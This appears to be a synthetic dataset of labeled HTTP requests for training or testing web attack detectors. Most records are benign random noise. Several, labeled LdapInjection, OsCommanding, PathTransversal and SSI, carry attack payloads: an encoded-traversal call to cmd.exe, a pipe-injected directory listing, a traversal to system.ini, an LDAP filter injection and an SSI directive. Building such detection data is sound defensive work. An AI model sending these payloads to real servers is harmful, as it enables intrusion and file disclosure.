If-Match: "pySYlm2FTvea1CU"
If-None-Match: "nvxhQ2q3l23iJF9C4"
If-Range: "f4CyStNj45abZ0xdwe"
Max-Forwards: 7161
MIME-Version: 7.4
Pragma: aeecxw='bebeta'
Proxy-Authorization: Digest response="bbDfe1acD0cE17D8d4AB2A7cdbb2Df5b"
Authorization: Digest nc=fdbDdF1a
Range: 38957-
Referer: http://iehe.gov/yothef/dn1A/sspsi.swf
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: ces7ucetT (oNGMRg; aa0gPJu4; 9Bz4JFeTx; qyvur814ws; i6PBlJvNF)
UA-CPU: 68000
UA-Disp: 6093,2247,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7605x6639
Via: 3.5 www.m06ete.htm
Transfer-Encoding: yft8A; nrjsndrf=estn
Upgrade: 1neao/3.0, tome/1.5, athaw/7.1, axd3ou/1.8, Iet/4.7
Warning: 043 205.130.181.187:01570 "r9oi9t" "Thu, 28 Jul 05 10:14:18 GMT"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 65212341307
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1646
Start - Id: 9481
class: Valid
GET /heersac5neeN8yeTy.jsp? HTTP/1.1
Host: 93.13.93.210:82156
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: Exs-5g, 5-lAl;q=0.9
Cache-Control: max-stale
Client-ip: 70.73.231.148
Cookie: hthghlykW4shsh=uenoFw7stake;sedzsber=b6replace1/;en74p=tri)f;eodhwliroSernan=92
Cookie2: $Version="2"
Date: Tue, 18 Apr 06 07:12:31 CET
ETag: W/"OV8lIQPxR4a1ovUasGG"
Expect: 100-continue
From: eo4la2@wre9irnxdA.be
If-Modified-Since: Mon, 12 Jan 04 06:49:19 CET
If-Unmodified-Since: Sat, 07 May 05 13:21:48 CET
If-Match: "60CqbyJWyk6@y7W"
If-None-Match: *
If-Range: *
Max-Forwards: 3833
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Ytur ieceeric=xuqi
Authorization: NTLM T29FZXZ1aWU1aXM3aHBwYzdZZWVlbHlqaUU5RW9kY21ob24=
Range: -6,7-441
Referer: /ithdi.sh
TE: gzip;q=0.0,trailers
Trailer: Accept
User-Agent: oyst/9.2
UA-CPU: MIPS
UA-Disp: 635,8626,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 279x7075
Via: pj2/6.1 58.231.161.184:7
Transfer-Encoding: bgvt; mkeN=toyt
Upgrade: dttwl/5.1, totora/7.4, s2q/7.4
Warning: 567 www.enh7hD.js "3todocz5ta" "Tue, 13 Nov 07 04:16:24 UTC"
X-Forwarded-For: 140.234.18.98
X-Serial-Number: 477624776956
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 9481
Start - Id: 39111
class: LdapInjection
POST /nMlwget7pD3WaPOUME/uMJcOFrtF/dlegetduha1ve9Dprnhm/vorsrtpwuM/samTfqJCAwindow.openiw0ibz/jiQD-cJmAwluPd1NF2Q/rauhorkn/gcnirebnp/eUAhrc@8tnPG/8fV9o/rq7DSWTpmx.t7W.swf? HTTP/1.1
Content-Length: 162
Content-Language: nGttde,vtuoiond,OHe
Content-Encoding: identity
Content-Location: /etm7iies/e7dp3/nCd9gtra/obres.pl
Content-MD5: YXJHbmljMjBpM2xlZG5yYw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 18 Aug 08 13:28:38 CET
Host: www.tlsyt.gov
Connection: er9tr
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Cookie: hh9er=taesv'h4;eaeacta=wosDnristdin;evalg-U-.passwd=)( |    (displayName=had*)  (name   =    had* )(  mail=had*  );Ubs=latns5ohN;kntlAepi4mitmb=Et@'mtdlinkapobs
Cookie2: $Version="980"
Date: Tue, 14 Sep 04 01:30:16 CET
Expect: eueD
If-Unmodified-Since: Sat, 25 Aug 07 19:17:21 UTC
If-Match: "B0di3nGZIHqquOyR6X"
If-None-Match: *
If-Range: Tue, 09 Dec 08 13:43:59 GMT
Max-Forwards: 801
Range: -3,085270-
Referer: http://tamv.de/laheht.cgi
TE: trailers
User-Agent: lsh1hs (w7Chxas7; 6ysquBzO0y; evaUl5e; d.68-lNyr; svEMNG)
UA-Color: color16
UA-Pixels: 7722x806
Via: 2.5 www.sanzqsd.jpg:461, FTP/5.1 www.teh3i9r.js, HTTP/0.2 www.Detaza.shtml
Transfer-Encoding: gzip
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nmrmdhus=gs&tOtee3a=dn&ongathIuehor=nxeIp&yos6o16s=iwyt&sau6ssh=valwherei4/&atjEeehap0a=6&or33=9i(d&1etpnhadSHi=044955027&eoitohhir=lDanuil d+i8nnenull]en

End - Id: 39111
Start - Id: 20251
class: Valid
GET /sock_streamZo0/w54tnl/atTdO/eC_cn48X/ay1hE4ytdadaag0/o_F.jsp?0fnelhtinnc=nba&Tesnr3mremwoh=tmc+n9z3l&eSGaccess_logD=teWsjj9Y1x HTTP/1.0
Host: 254.157.140.81:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: eihfmtb-uddttu;q=0.8, plDwa-fgveNre
Cache-Control: no-cache
Client-ip: 19.20.120.255
Cookie: mtthlFeOtndA=oons7HOewae8opa
Cookie2: $Version="38"
Date: Sat, 25 Nov 06 01:28:24 GMT
ETag: W/"2kyqfNYeCXXfvBnu7s"
Expect: 100-continue
From: netyzah@uidoqet.be
If-Modified-Since: Thu, 26 Aug 04 23:12:52 UTC
If-Unmodified-Since: Sat, 01 May 04 09:33:29 CET
If-Match: "d8CQY0hWuO86SlcfG"
If-None-Match: "96ZHcJJcJkA_Z_QPplf"
If-Range: Sat, 12 Dec 09 19:47:27 UTC
Max-Forwards: 58
MIME-Version: 7.7
Pragma: oe5hax='htlt'
Proxy-Authorization: wd94db gsNbmqhR=ptetde
Authorization: Digest username="9otn"
Range: 90-31589,62-
Referer: /iGeXda/ysgtrsga/tmniepn.cgi
TE: trailers,chunked,gzip;q=0.4
Trailer: Warning
User-Agent: iD-OMj http://www.beceOn.cz
UA-CPU: MIPS
UA-Disp: 161,462,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1025x741
Via: 1.4 83.111.239.118, 8.8 www.spqLtt.html, e2s/5.5 163.75.197.17
Transfer-Encoding: gzip
Upgrade: 6Nl/9.6, iln/2.9
Warning: 407 www.lti8nm6y.gif "4cis0daFde" 
X-Forwarded-For: 53.85.23.141
X-Serial-Number: 11361465282
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 20251
Start - Id: 34442
class: Valid
PUT /bMxterm-5_Pvaro/iwadmEsOarcdjfg6/ir/2ngksespGbnrt97sugk/rn@iz5uUS_cxXBl8W6/a-7bsOoIiI43id/mdJrq-n9auAS/gUzVjv.BF3M.jpeg? HTTP/1.0
Content-Length: 145
Content-Language: eoiin,dfahe0ni,qtoeet
Content-Encoding: identity
Content-Location: http://ezdamleh.st/ueob/vaQr/oiPn.swf
Content-MD5: c3RZd2UxbmUyNHN3bm91aw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Dec 08 07:25:47 CET
Last-Modified: Mon, 21 Jan 08 13:02:48 CET
Host: www.twfiamjrt.be:80
Connection: keep-alive
Accept: application/x-tar;q=0.4
Accept-Charset: iso-2022-kr, euc-tw;q=0.7, cp-932, euc-cn, windows-874;q=0.0
Accept-Encoding: gzip;q=0.3, deflate;q=0.6
Accept-Language: kf0tan-9, EQtcote-Tnl, toi5t8j-nhoiX
Cache-Control: no-transform
Client-ip: 94.185.20.126
Cookie: xa1ietemctd=hr8ueecn2tDepnefkn;hnauea=7114460105;tio3ttsN=ar samwinsertnw]rif;iksat5a4a=utdg
Cookie2: $Version="3"
Date: Tue, 23 Jan 07 07:50:54 UTC
ETag: "B4iaVCWq5oYBZI8"
Expect: 100-continue
From: 28uathhe@snieri.org
If-Modified-Since: Sun, 18 May 08 07:02:25 UTC
If-Unmodified-Since: Mon, 12 Jun 06 10:39:21 UTC
If-Match: "DvhCNCwOgahdJimkGf"
If-None-Match: "DZr2JBYc@j59.42QUMn"
If-Range: "LZwolViKE-f6oe5MjbPC"
Max-Forwards: 296
MIME-Version: 1.6
Pragma: tt4r=te
Proxy-Authorization: Uhrq soeookna=poTmhdr
Authorization: NTLM dXl0cE5zQml1ZHNFZGVjbHN0c2VqNWx4dHNzV2lzdGY0aHN0b2E4dGF0
Range: 916-45875,-43,5452-
Referer: /drNe/7RReslp/WShmmxl.doc
TE: deflate,chunked;q=0.7,trailers
Trailer: If-Unmodified-Since
User-Agent: 3bceon8c (adsPa2; egicZ5BE; 3UDLdO)
UA-CPU: StrongARM
UA-Disp: 7247,384,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 840x4922
Via: 0.2 157.107.45.56, HTTP/2.0 www.eahsm.html:5, 0.2 160.176.148.245:77
Transfer-Encoding: gzip
Upgrade: uaurte/3.6, iso8e/5.4, lqc/9.0
Warning: 315 www.7t2c.htm "acofigut9hd4pPtttlg" "Fri, 28 Oct 05 06:13:23 GMT"
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 22221039836
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~

5yeaoete=a@Ek8HEzOh&cNxtTvar5d=05559723&paWwe=b)&rey&yhoer8Sl1rlsp4=h0n0cEq&rb3hesigo=fCd]SeBA)]&Qkayehiedh=7744959812&ottzov=xq-etcu

End - Id: 34442
Start - Id: 36487
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 26.219.239.218
Connection: close
Accept: audio/*;q=0.9, video/*;q=0.7
Accept-Charset: x-mac-korean
Accept-Encoding: *;q=0.0
Accept-Language: wiQasMeo-pee;q=0.2, zremj-mn;q=0.5, s-qrrh, dk1h-m6ayfs
Cache-Control: ncaJ='e'
Client-ip: 7.170.218.4
Cookie: fttn4ar7aam=smt+>;o1nploqineho=11;e8aserfzOhtcaei=t l1eilikeqoixwe;namhe=00;hsoeorvnkeaEndo=gway9ru;KSrLGO=q
Cookie2: $Version="984"
Date: Thu, 29 Jun 06 01:17:58 CET
ETag: "EEjfH1qoZefe@m2kmR"
Expect: 100-continue
From: n8us@72HjX.ch
If-Modified-Since: Thu, 15 Feb 07 05:51:15 UTC
If-Unmodified-Since: Tue, 17 Jun 08 13:42:44 GMT
If-Match: *
If-None-Match: "WV99r78SvCx-jsQKD"
If-Range: Thu, 17 Aug 06 17:47:41 UTC
Max-Forwards: 615
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: iuqrt iwRdnnb=pgerxsn
Authorization: sfc3 r71cbrg=iiIalelE
Range: 998505-,-0540,815-
Referer: http://n3uhKJ.uk/sUlese3/rmrtAl.txt
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: estsiethho
UA-CPU: 68000
UA-Disp: 900,140,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 512x1298
Via: FTP/1.6 www.eeahm8my.htm
Transfer-Encoding: oeEjm
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 5785430371432590
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36487
Start - Id: 14526
class: Valid
GET /eEe1sSseebZtehe/gzXD9RnO/gF@u/eeft8laviu3ieCenh/gknip1ohnuiif/Xp@passthru/MWGN-uyo/sHiHOg3iAHpkn/enmufesuIaepeeT.jpeg?souEestt1e=om&eFi=9 HTTP/1.1
Host: www.2Eworihn.com
Connection: iieOty
Accept: application/rtf, image/*;q=0.9, audio/*
Accept-Charset: iso-10646-ucs-2;q=0.4
Accept-Encoding: 
Accept-Language: eoa-br3c, rji-0sle;q=0.0
Cache-Control: max-age=6
Client-ip: 162.156.75.53
Cookie: nitiddih=e1G3gnlQ;l0oonm=\t5raau)Htelnetd;hsoneigerw=n2L12dNwa;r58svd8yaeSao=7E@8BA7@
Cookie2: $Version="01"
Date: Mon, 04 May 09 14:00:18 CET
ETag: "rRmqwhf@rbp5lVhHR"
Expect: 6bSwh=5eza
From: vevejh@0Noynt.net
If-Modified-Since: Sun, 08 Jan 06 08:52:55 UTC
If-Unmodified-Since: Thu, 27 Nov 08 03:24:50 CET
If-Match: *
If-None-Match: "G_j74Q.2qs7Cyq1307"
If-Range: *
Max-Forwards: 581
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: hyla8 cehe=cegetee
Range: 4019-22,-23,269-5
Referer: http://aoEca.uk/sdwer/drrjerI.css
TE: deflate;q=0.7,gzip
Trailer: If-Range
User-Agent: Mozilla/3.7 (X11; U; Open BSD i586 3.0; te-yn; rv:1.2.0) Gecko/95013179
UA-CPU: x86
UA-Disp: 419,862,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 3486x145
Via: 0.5 www.hsesTi.js, 3.9 117.122.207.169
Transfer-Encoding: tsyniR; mhnio=renoEa
Upgrade: deoC/9.0, lnte1/6.7
Warning: 202 www.tceh.js "i3meintolnieF2asaend" "Wed, 08 Feb 06 16:32:21 GMT"
X-Forwarded-For: 152.218.118.157
X-Serial-Number: 01337
----: -----------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 14526
Start - Id: 11214
class: Valid
GET /9-IctpxidC.YSt/iU/larduel8ymcm5sancen/2v/uqQrA/nqn5sdceleme.png?BKrOeyxtermDW36o=whe&updatev_Xgroup bywKEK4=riinaSr&dwcqyqraab=e7qn0einriure&newtRasg5=td&Ex9tanasreTS=cqNI_n&e5trytn8g=460&c5mordE=sno16udnicn HTTP/1.1
Host: 125.84.58.108
Connection: keep-alive
Accept: application/zip, application/rtf, video/mpeg
Accept-Charset: euc-kr;q=0.2, iso-8859-7;q=0.6, windows-1255;q=0.3, x-mac-hebrew;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: fe3eIfsi-btgmttor;q=0.5, Fe1R-i, haoshay-obo, zy-vcTr
Cache-Control: max-stale
Client-ip: 240.243.162.33
Cookie: ii4oiuMzoxE8ti=binl;O0NC=:a8
Cookie2: $Version="8"
Date: Wed, 10 Jun 09 23:58:44 CET
ETag: "38qS-N0jSwDiV_n"
Expect: hy0n=r6nedoRt;mCaq
From: oner40@a3mRaitss.com
If-Modified-Since: Wed, 17 Aug 05 08:26:40 UTC
If-Unmodified-Since: Fri, 03 Sep 04 16:58:43 UTC
If-Match: *
If-None-Match: "E1S.c4Q6WC67bqZ@"
If-Range: "E20slhWpYNRbXwhvP."
Max-Forwards: 9
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: isrts ieloau=saeo
Authorization: Basic TnV3bjpwY2xoczh3ZQ==
Range: -62895,1183-7810
Referer: /lneRtrua/kzceqo.php3
TE: trailers
Trailer: From
User-Agent: ttlxte2Hm (ilDnQlIRZH)
UA-CPU: StrongARM
UA-Disp: 473,1490,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 1597x0250
Via: HTTP/5.5 www.sbxh.tiff:488, mlhsn/9.8 www.ErEEc.jpeg, 0.3 101.27.212.132
Transfer-Encoding: compress
Upgrade: soi/9.2, sgsr8/4.6
Warning: 482 www.nt5e.js "raopnnI2epacwex" "Sun, 04 Jan 04 12:41:28 CET"
X-Forwarded-For: 137.203.184.31
X-Serial-Number: 450563801661696804
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11214
Start - Id: 21520
class: Valid
GET /nsQ_9@rfMxusrd./tkgySj7hkC5UhpAL7d/sartjpnaEn/CzWFqDvfMDH/p9dnpsh2/eoi35fESntnq/2WAtU1Np7Hjp/pRuiEB/erEyvm6.WB3Cw/hia8aeataatosNe4az/tgoigtZY0hUhof51PIQ/te3pwmdUsxDHc.mspx?39Ui=m2+%5C%7Emd&osdsiahlinshg=r%27at&wNopiH=gEFqcc&eEsecho=rMc6ORpAftHu HTTP/1.1
Host: 114.118.241.14
Connection: keep-alive
Accept: audio/*, text/*, text/*
Accept-Charset: x-mac-chinesesimp, windows-1251;q=0.3, macintosh
Accept-Encoding: identity;q=0.9, gzip, identity;q=0.6, compress
Accept-Language: *
Cache-Control: max-stale=4
Client-ip: 124.127.111.172
Cookie: qlLna4=x
Cookie2: $Version="611"
Date: Mon, 09 Feb 09 18:55:06 UTC
ETag: W/"ntfELDStUc0DhxJ4BRh"
Expect: bnur
From: suioa@wtliyr.cz
If-Modified-Since: Sat, 29 Jan 05 09:05:12 GMT
If-Unmodified-Since: Sat, 07 Feb 09 16:00:15 GMT
If-Match: "Sv0tvGugvYXONEW"
If-None-Match: *
If-Range: "JH-K0gu4D.qZUFV2.N"
Max-Forwards: 86
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: 0yw5ox eiep5=laseOb
Range: -6570,934358-908192
Referer: http://jederm.uk/agad2u.gif
TE: trailers,gzip;q=0.7,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.5 (Windows; U; WinNT 1.1; nl-3e; rv:3.1.7) Gecko/17436275
UA-CPU: StrongARM
UA-Disp: 1794,9369,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5415x3665
Via: FTP/8.8 252.149.28.108, FTP/5.2 234.11.168.74
Transfer-Encoding: identity
Upgrade: ehe/1.1
Warning: 989 95.146.49.238 "goslds92assa6" "Thu, 02 Oct 08 01:14:20 UTC"
X-Forwarded-For: 9.183.95.174
X-Serial-Number: 15490998338905562
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21520
Start - Id: 31147
class: Valid
GET /lyvnuRtxUthcgEtersc/x1hesDrhestttbaXc/wsJ6TVIPyviL/1lftpyzIeeBKM15betweenR/jsumeat/wAejlsamsystem.js? HTTP/1.0
Host: 49.101.170.177
Connection: sncbdb
Accept: */*
Accept-Charset: big5;q=0.4, big5, iso-8859-6;q=0.6, x-mac-korean, iso-8859-6
Accept-Encoding: deflate, gzip, compress;q=0.4, identity;q=0.1
Accept-Language: x-s;q=0.4, usj2p-0e8Bgmo4, ntnnm-teos;q=0.1, e5sha-ae
Cache-Control: no-cache
Client-ip: 145.177.61.251
Cookie: uDl_.G=bodyvbetweenrcmdioeoiKt;7iokt4aacw0=weperl7hasn5h>fa;aur=tbxulhfuisga;pl=365179
Cookie2: $Version="698"
Date: Sat, 11 Oct 08 09:30:24 UTC
ETag: W/"SElZ2btlWPrC_9kq"
Expect: tsre
From: eHyxdc@nttofeahoi.net
If-Modified-Since: Mon, 19 Oct 09 09:58:54 GMT
If-Unmodified-Since: Fri, 24 Jun 05 09:16:53 UTC
If-Match: *
If-None-Match: "@QbRuT5nKqzINR1x"
If-Range: Tue, 23 Dec 08 20:35:05 GMT
Max-Forwards: 9493
MIME-Version: 5.8
Pragma: owtehht='otle'
Proxy-Authorization: NTLM THBlZTh0aXdxbmFtZlVvZXJtaDJuZWVsaGJldTh6ZXZybmltbGxyZW5zZWJlZGpi
Authorization: suby Eszi=osbl
Range: 41-,7530-978
Referer: /meerptd2/iilv4cfy/rdmTe/bc1nte/nyytgt.jpeg
TE: trailers,trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/1.0 (Machintosh; U; PPC Mac OS X 8.7; 1y-he; rv:0.6.9) Gecko/71345561
UA-CPU: PowerPC
UA-Disp: 342,300,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 006x0158
Via: HTTP/3.5 82.62.197.149:3
Transfer-Encoding: deflate
Upgrade: 2ro3rd/5.8
Warning: 406 www.aeUwu.shtml "s2n0a3tdlcheeb4euana" 
X-Forwarded-For: 129.20.120.4
X-Serial-Number: 16589272146
----: ---------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 31147
Start - Id: 43985
class: OsCommanding
GET /cgi-local/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: 155.192.242.55
Connection: keep-alive
Accept: audio/basic, text/xml;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, gzip;q=0.9, compress;q=0.1, identity, compress
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 60.172.21.158
Cookie: lRtftdiaos=l5ldropt;nattts=e/;V9ftpNpassthruBnull=~ p;RnSq1e8e=e3y0e5ai
Cookie2: $Version="880"
Date: Fri, 21 Jan 05 03:13:19 UTC
ETag: "eWaaxQ@0tex2f3f4WX"
Expect: 100-continue
From: 44fa@mshrPyo.gov
If-Modified-Since: Wed, 10 Jun 09 21:13:12 CET
If-Unmodified-Since: Mon, 14 Aug 06 01:46:33 CET
If-Match: "0HCku5I6FQGDVvH"
If-None-Match: "uY20zzYkeH0twEb"
If-Range: "xP75Aa9058Vh6nUsJeL"
Max-Forwards: 37
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: Digest opaque="rpcs"
Range: -2,795-,-91
Referer: /Nsir1j/ligeta/lcp3nta.sh
TE: trailers
Trailer: Referer
User-Agent: cnafh4w (iHS9okGfy)
UA-CPU: x86
UA-Disp: 603,719,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5667x180
Via: 5.5 68.98.66.251, 2.3 www.ouisohz3.jpg
Transfer-Encoding: identity
Upgrade: dsss/1.1, o8rt/7.8, 7ln/9.8
Warning: 170 126.27.186.211 "do3kdsikezlS" "Fri, 29 May 09 15:50:00 UTC"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 0238544076735030129
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43985
Start - Id: 18576
class: Valid
GET /eKn2ee7lgGaLUz60jz/ganwSlarloiooTeidc0a/euasvAxchbsooi2/tJh0AZaiBbCllRhl/e5e/oisdediti/i3/eEZbFFmXY0uGc/wO/KsX9q5/apRUWBg2zf.swf? HTTP/1.1
Host: 100.252.237.160
Connection: 5e1k
Accept: */*;q=0.4
Accept-Charset: iso-8859-9;q=0.9, iso-8859-4;q=0.7, utf-8;q=0.2, iso-2022-kr
Accept-Encoding: compress, gzip;q=0.4
Accept-Language: ha0eeais-a, nc-itgbtlzu, a-h
Cache-Control: no-transform
Client-ip: 82.193.57.231
Cookie: Xooce=0p6e6e;iavwyHsWlhlo=j(ug;NrnaihaymRgk=childvq ~hi%dstylehrtnetcatsqgskn;vTsM=571
Cookie2: $Version="394"
Date: Mon, 27 Jun 05 02:16:27 CET
ETag: "seZrZcY201BJTWfCzn"
Expect: 100-continue
From: tyie@t8hupt4y.biz
If-Modified-Since: Tue, 22 Nov 05 12:17:37 UTC
If-Unmodified-Since: Sun, 29 May 05 18:35:24 GMT
If-Match: "gqaeHcJ1MciIogOYf2B"
If-None-Match: "E0Q6LxCaHslUGrB"
If-Range: *
Max-Forwards: 7
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM ZXB1ZWJyZXJlb29jVmk1c2VocnRUYW9kdGdsdHJ0ZmVsbkd0
Authorization: NTLM aXNFZHRsZXUxeGxmTmVlaXMwRXJnb25mZnJscmRyaHV0
Range: -49105,7-,-99029
Referer: http://ntot.com/b1c2/znbpuqps/4Csr.mp3
TE: trailers,gzip
Trailer: Upgrade
User-Agent: 7iicitaasnna
UA-CPU: StrongARM
UA-Disp: 973,9699,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 924x1764
Via: ioDpad/3.5 214.77.170.212:733, HTTP/2.6 www.uyAiv.jpeg:10, FTP/3.4 www.oheLngn.jpeg:32
Transfer-Encoding: compress
Upgrade: fsooht/0.4, Rtho/8.1
Warning: 223 151.230.160.155 "9e8eoa0eiupts" 
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 5275417483977
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18576
Start - Id: 2188
class: Valid
GET /nliteetieMysnwoe7xi/ir7JSUgmMn_It5cdQ9/i8EEoxtHhQEOcH.7qy.mspx? HTTP/1.1
Host: www.earneu.fr
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: e-set
Cache-Control: no-cache
Client-ip: 252.18.215.205
Cookie: mgts=604951;9eihspgfj=Ieokwmhel;Aixu0pt=p
Cookie2: $Version="0"
Date: Fri, 02 Sep 05 20:39:27 UTC
ETag: "7dKcolqFrPttQt23Vf"
Expect: 100-continue
From: uh0aptar@aseielph5.com
If-Modified-Since: Thu, 09 Feb 06 07:00:47 UTC
If-Unmodified-Since: Thu, 03 Aug 06 14:25:52 CET
If-Match: "@rY@8m0-qYMKf2YW0vQ"
If-None-Match: "A1Py8hw4W_-x1Oh4vd"
If-Range: *
Max-Forwards: 5
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM ZW9vem9xYXRseGtpUG5lZUVva0JsZXl5YnUxYXJvdHBobHZlZ29SSUE=
Authorization: Digest username="kdhf"
Range: 646-76073,721917-1
Referer: http://ltssnsn.net/d7hw.bin
TE: trailers
Trailer: Referer
User-Agent: Mozilla/8.5 (Machintosh; U; PPC Mac OS X 9.3; fe-si; rv:1.1.4) Gecko/75788801
UA-CPU: PowerPC
UA-Disp: 8951,7788,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 270x992
Via: HTTP/7.5 123.93.247.145, HTTP/1.0 61.211.51.86:57, eAa1/9.3 www.oltro.html
Transfer-Encoding: identity
Upgrade: sna/4.3
Warning: 821 104.1.134.166 "maqrtuteli" "Fri, 07 Jan 05 07:27:00 CET"
X-Forwarded-For: 130.173.148.175
X-Serial-Number: 26606464842114964
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2188
Start - Id: 45995
class: PathTransversal
PUT /cae5ghkurkiede/pmo7uephanfehv0wiset/kMRs6sA4daetahes/e-22/i8wAy4__XG-@2Ms/texVnEsyist9t/tTuPx/RtnodevPD6Jreplace5Es.sh? HTTP/1.1
Content-Length: 317
Content-Language: yx51o,6tjr1
Content-Encoding: compress
Content-Location: http://eztpn.fr/bAeeolay/ni7haeG/woEvLee.mdb
Content-MD5: ZExuVXNzZm50dGVFdG9zbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 16 Dec 06 21:07:07 UTC
Last-Modified: Mon, 31 Dec 07 15:14:01 GMT
Host: www.nao0erstr.cz
Connection: cRee
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: diron-roALsarr
Cache-Control: only-if-cached
Client-ip: 243.169.251.155
Cookie: Beqb6Ee=..\..\..\..\..\..\WINNT\system.ini;lUWcZdNJy=rweincludeOnes;
Date: Tue, 19 Apr 05 04:44:56 GMT
ETag: ".OJXtIXHMTDLuwgpLDY0"
Expect: 100-continue
From: h4leog@lneuabul.uk
If-Modified-Since: Fri, 24 Dec 04 01:35:50 CET
If-Unmodified-Since: Tue, 17 Aug 04 10:30:57 GMT
If-Match: *
If-None-Match: "ILy_djoiX7VOzWt0"
If-Range: *
Max-Forwards: 670
MIME-Version: 8.3
Pragma: no-cache
Authorization: wei9 ecsazo=ohenn
Range: 44665-,552-,1-
Referer: /roietdtw/utik0ln/ow5hge.cfm
TE: gzip,chunked;q=0.6,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.5 (X11; U; Solaris 3.0; sa-uL; rv:7.8.5) Gecko/31234444
UA-CPU: Sparc
Via: 5.1 www.EtalOhfg.shtml, FTP/3.3 www.f2Hin.gif:90
Transfer-Encoding: compress
Upgrade: vysgb/3.2, qh8Atn/8.2
X-Serial-Number: 30022157350213308791
~~~~~: ~~~~~~~~~~~~~~~~

6ro9ahefdr=13300&ios4tanttsetme=oiidiinput?adprocessing-instructionssmmailtapa]&Lmat2=i t&3sYr6sxeprtOUii=cettautoexecadm&dencw=grt3E&rwctWt22akeu=6zoe9pezoxhRieo&irehLjven83dpe1=nNgcDnrlii&raI3cani7=8018013&wt=8hubEbDpuEKeuus&wh7e=select9eNeaa4ncteio-ns&szl=-Bform:uhoeWmtmar&trnIUhisprf=otoa&ruojs9eger=040168

End - Id: 45995
Start - Id: 39494
class: SSI
PUT /s0j1nyS7690xu4WTsf2/rzxTaInerma7/rK_R53o6AE50/b34tiha3hyeD/esPV.exe? HTTP/1.1
Content-Length: 167
Content-Language: o,ha
Content-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
Host: 63.182.126.251
Connection: on6ixlet
Accept: */*;q=0.7
Accept-Charset: x-mac-chinesetrad;q=0.4, x-mac-cyrillic
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 70.46.103.95
Cookie: rog=<!--#echo var="date_gmt"-->;aeeareN=af entdc
Date: Wed, 12 Aug 09 04:47:42 GMT
If-Match: *
If-None-Match: "72D_2kuXjoTffoa"
If-Range: "kvgyiJT-IUHQQN5iB5"
Max-Forwards: 537
Authorization: NTLM bm9pY2FJYW5hcmlvb2VIcmllZXNvRWplbGpHcm83ZWxmbWV5a24=
Referer: http://idctmCa.biz/cemb/dohl/iyahewot/irzeoI/slrs.msf
User-Agent: rEoeefIz
----: ---------------------

